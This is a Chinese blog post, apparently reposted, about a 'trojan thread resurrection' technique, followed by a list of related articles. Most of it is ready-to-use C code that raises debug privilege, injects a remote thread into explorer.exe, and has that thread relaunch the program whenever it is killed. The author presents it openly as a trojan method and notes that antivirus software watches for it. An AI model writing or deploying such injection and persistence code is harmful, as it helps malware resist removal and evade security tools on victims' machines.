木马的线程复活技术

最新推荐文章于 2021-04-28 23:49:51 发布
最新推荐文章于 2021-04-28 23:49:51 发布
阅读量209 收藏
点赞数
原文链接:http://www.cnblogs.com/littleevil/archive/2012/05/21/2511278.html
版权

远程线程插入技术,挺常见而实用的东西。

只是这个远程线程插入函数被很多杀软作为重点监视对象,所以不知道这东西以后还能用不。

///
//NotDead.h
//
#include <windows.h>
#include <TLHELP32.H>

TCHAR exepath[MAX_PATH]={0x00};

//参数结构
typedef struct _remotepara
{
    DWORD    pWaitForSingleObject;
    DWORD    pOpenProcess;
    DWORD    pWinExec;
    DWORD    PID;
    HANDLE    hProcess;
    char    path[MAX_PATH];
}REMOTEPARA,*pREMOTEPARA;

//开启本线程的Debug权限
bool EnableDebugPrivilege(const char *name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    
    if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
        return false;
    if (!LookupPrivilegeValue(NULL,name,&tp.Privileges[0].Luid))
        return false;
    tp.PrivilegeCount=1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
        return false;
    return true;
}

//根据进程名获取PID
DWORD GetProcessId(char *ProcessName)
{
    PROCESSENTRY32 pe32;
    
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if (hProcessSnap==INVALID_HANDLE_VALUE)
        return 0;
    BOOL bProcess=Process32First(hProcessSnap,&pe32);
    while(bProcess)
    {
        if (strcmp(strlwr(pe32.szExeFile),strlwr(ProcessName))==0)
            return pe32.th32ProcessID;
        bProcess=Process32Next(hProcessSnap,&pe32);
    }
    
    CloseHandle(hProcessSnap);
    return 0;
}

//远程线程函数
DWORD WINAPI remote(LPVOID _rp)
{
    REMOTEPARA *rp = (REMOTEPARA*)_rp;
    typedef UINT (WINAPI *XWinExec)(LPSTR,UINT);
    typedef HANDLE (WINAPI *XOpenProcess)(DWORD,BOOL,DWORD);
    typedef DWORD (WINAPI *XWaitForSingleObject)(HANDLE,DWORD);
    
    //获取自定义函数
    XWaitForSingleObject MyWaitForSingleObject = (XWaitForSingleObject)rp->pWaitForSingleObject;
    XOpenProcess MyOpenProcess = (XOpenProcess)rp->pOpenProcess;
    XWinExec MyWinExec = (XWinExec)rp->pWinExec;
    
    //检测要保护的进程是否被关闭,是则重启进程。
    rp->hProcess = MyOpenProcess(PROCESS_ALL_ACCESS,FALSE,rp->PID);
    MyWaitForSingleObject(rp->hProcess,INFINITE);
    MyWinExec(rp->path,SW_SHOW);

    return 0;
}


int NotDead()
{
    //提权
    if(!EnableDebugPrivilege(SE_DEBUG_NAME))
        return 0;
    //获取保护和被保护进程PID
    DWORD ProctectPID,ProctectedPID;
    ProctectedPID=GetCurrentProcessId();
    if ((ProctectPID=GetProcessId("explorer.exe")) == 0)
        return 0;
    //打开保护进程句柄
    HANDLE hProtecte = OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProctectPID);
    if (hProtecte==NULL)
        return 0;
    //在保护程序中申请空间,准备写入remote()
    HANDLE RemoteAddrFun;
    RemoteAddrFun = (PTSTR)VirtualAllocEx(hProtecte,NULL,1024*4,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if (RemoteAddrFun==NULL)
        return 0;
    //写入remote()
    if (WriteProcessMemory(hProtecte,RemoteAddrFun,(LPVOID)remote,1024*4,NULL)==FALSE)
        return 0;
    //定义远程线程函数参数
    REMOTEPARA rp;
    memset((char *)&rp,0x00,sizeof(rp));
    GetModuleFileName(NULL,rp.path,260);
    rp.PID = ProctectedPID;
    HMODULE hkernel = GetModuleHandle("kernel32.dll");
    rp.pOpenProcess = (DWORD)GetProcAddress(hkernel,"OpenProcess");
    rp.pWinExec = (DWORD)GetProcAddress(hkernel,"WinExec");
    rp.pWaitForSingleObject = (DWORD)GetProcAddress(hkernel,"WaitForSingleObject");
    //在保护程序中申请空间,准备写入参数
    HANDLE RemoteAddrPara;
    RemoteAddrPara = (PTSTR)VirtualAllocEx(hProtecte,NULL,sizeof(rp),MEM_COMMIT,PAGE_READWRITE);
    if (RemoteAddrPara==NULL)
        return 0;
    //写入参数
    if (WriteProcessMemory(hProtecte,RemoteAddrPara,(LPVOID)&rp,sizeof(rp),NULL)==FALSE)
        return 0;
    //===================================
    //        创建远程线程
    //===================================
    HANDLE hRemoteThread = CreateRemoteThread(hProtecte,NULL,0,(LPTHREAD_START_ROUTINE)RemoteAddrFun,(LPVOID)RemoteAddrPara,0,NULL);
    if (hRemoteThread==NULL)
        return 0;
    CloseHandle(hProtecte);
    return 1;
}

 

使用方法:只需要在程序中调用NotDead()即可。

示例:

// X.cpp : Defines the entry point for the application.
//

#include "stdafx.h"
#include "resource.h"
#include "NotDead.h"

INT CALLBACK DlgProc(
                            HWND hwndDlg,  // handle to dialog box
                            UINT uMsg,     // message
                            WPARAM wParam, // first message parameter
                            LPARAM lParam  // second message parameter
)
{
    switch(uMsg)
    {
    case WM_INITDIALOG:
        NotDead();
        break;
    case WM_CLOSE:
        EndDialog(hwndDlg,0);
        break;
    }
    return 0;
}

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
    DialogBox(hInstance,MAKEINTRESOURCE(IDD_DIALOG1),NULL,DlgProc);
    return 0;
}

 

转载于:https://www.cnblogs.com/littleevil/archive/2012/05/21/2511278.html

weixin_30536513
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自我复制隐藏删除双进程复活
02-14
易语言代码 自我复制隐藏删除双进程复活
自动复活异常终止进程
神经网络爱好者
04-24 1414
自动复活异常终止进程01-6-26 上午 10:09:05问题的产生微软公司的Windows 操作系统已深入到各个领域,基于Windows的应用程序更是层出不穷。但人们或多或少都有这样的经历,运行在Windows上的应用程序会发生异常终止,这时一般要通过手工重新将其启动。此时,若计算机无人看守,则异常终止的进程就有可能影响正常工作。笔者在开发GPS全球卫星定位系统控制中心程序时,就遇到过控制中心程
异常死亡进程的自动复活 (转)
csobhtdx34120的博客
08-12 112
异常死亡进程的自动复活 (转)[@more@]异常死亡进程的自动复活一、问题的产生 我们或多或少都有这样的经历,在windows上运行的应用程序常常会异常终止,需要通过手工重新将其启动起来。若计算机无人看守,异常终止的进程不能实...
linux 进程复活,Linux内核安全详解 "ping到死"复活
weixin_42356331的博客
04-28 117
对于电脑用户来说,Windows的强大功能服务了广大用户, 不过Windows安全问题还是让很多人头疼,所以很多人开始应用Linux,不过Linux内核安全也不知大疏忽,今天就讲讲Linux内核安全问题清理。Linux内核 内核安全对于电脑用户来说,Windows的强大功能服务了广大用户, 不过Windows安全问题还是让很多人头疼,所以很多人开始应用Linux,不过Linux内核安全也不知大疏忽...
让一个进程不断复活的软件源码
04-09
让一个进程不断复活本人看了很多网上有关的源码,基本上都是一样的,不过功能就不是很强大 有感与此,本人特写了一个功能强大点的欢迎大家使用
线程扫描网页木马
08-09
在IT安全领域,多线程扫描网页木马是一项重要的技术,用于快速有效地检测和清除潜在的恶意代码。这里,我们将深入探讨多线程的概念、它如何应用于木马扫描,以及如何通过遍历文件来判断是否为网页木马。 首先,多...
硬件木马防护技术研究
01-20
对硬件木马防护技术进行了深入研究,提出一种新的硬件木马防护分类方法,系统全面地介绍了近年来主流的预防与检测技术,并通过分析比对,给出各方法的特点和存在的问题。最后,提出新的防护技术设计思路,对未来研究...
Android系统木马隐藏及检测技术
05-24
Android系统木马隐藏及检测技术是当前移动安全领域内一个非常关键的研究课题。随着Android操作系统的普及,越来越多的用户使用这一平台进行通信、娱乐、学习及工作,随之而来的是针对Android系统的恶意软件数量急剧...
用Visual C++实现远程线程嵌入技术
01-19
远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)...
线程守护实例 远程线程 木马常用技术 VC6.0
02-15
本篇文章将深入探讨这两个主题,并结合木马常用技术,以及如何在Visual C++ 6.0(简称VC6.0)环境中进行实践。 首先,我们来了解什么是线程守护。线程守护在多线程编程中,通常指的是一个线程负责监控其他线程的...
死而复活的android进程永存
11-20
死而复活的android进程永存: 不要走漏洞路子,那是有时间限制的,因为未花钱,所以得不到真正的系统权限,即使这样,系统还是有弱点,使用后别暴露。
进程自动复活-易语言
06-13
进程自动复活
e语言-进程自动复活模块
08-23
资源介绍:进程自动复活模块源码资源作者:易语言源码下载资源下载:
异常死亡进程的自动复活
zou5655的专栏
12-09 1587
异常死亡进程的自动复活一、问题的产生 我们或多或少都有这样的经历,在Windows上运行的应用程序常常会异常终止,需要通过手工重新将其启动起来。若计算机无人看守,异常终止的进程不能实时启动,则可能给生产造成损失。 本人在开发GPS全球卫星定位系统控制中心程序时,就遇到过控制中心程序异常终止死亡的情况,由此,找出了一个自动复活死亡进程的方法,供参考。 二、相关知识 通常,把一个应用程序的一次运行实例
VB 进程死亡的自动复活(进程结束再自动运行)
資料為我做事
03-09 292
  前两天看了Delphi版面精华区中的《进程死亡的自动复活》一文,觉得作者的思路很不错,利用api来监视进程的活动,当被销毁时就自动再创建进程。仔细推敲之后,发觉其实用vb也是可以做到的。于是花了半天的时间写了以下的程序,实现了使用WaitForSingleObject API来监视被创建的进程的活动,一旦返回除 time out 之外的消息就自动创建新的进程。以下为其实现代码。在 win200...
linux 进程复活,复活意义何在:QQ for Linux 新版测试
weixin_42512836的博客
04-28 224
QQ,一个承载了太多国人记忆的聊天软件,也是一个承载了 Linux 用户太多纠结的聊天软件。薄荷君自 2004 年接触 Linux 开始,如何在 Linux 上运行 QQ,就是一个经久不衰的话题。开始时使用 GAIM+QQ 插件,2005、2006 年时某大神的 LumaQQ 堪称神器,再后来就是 Pidgin+lwqq 插件(网页版 QQ 而已),直到近 3、4 年,承蒙...
关于进程保活的一切
齐天的博客
06-20 617
进程保活一、进程保活 6.0以下1)监听广播方式2)提高Service的优先级3)全局定时器4)应用中的双service拉起5)应用中的双进程拉起6)单进程守护7)双进程守护二、进程保活 6.0~8.0(一)防杀策略1)开启前台Service2)监听锁屏广播,制造1像素2)循环播放一段无声音频(二)复活策略1)使用JobScheduler2)推送SDK3)第三方应用互相唤醒三、进程保活8.0以上(一)保活困难的原因1)应用待机分组1、活跃 (Active)2、工作 (Working set)3、常用 (Fr
木马病毒防治技术与系统实现探讨
"木马病毒防治技术研究及系统实现" 这篇硕士学位论文主要研究的是木马病毒防治技术及其系统实现,由苏州大学的黄树撰写,导师为徐汀荣,专业为计算机技术,完成于2007年。论文深入探讨了木马病毒对计算机系统的破坏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值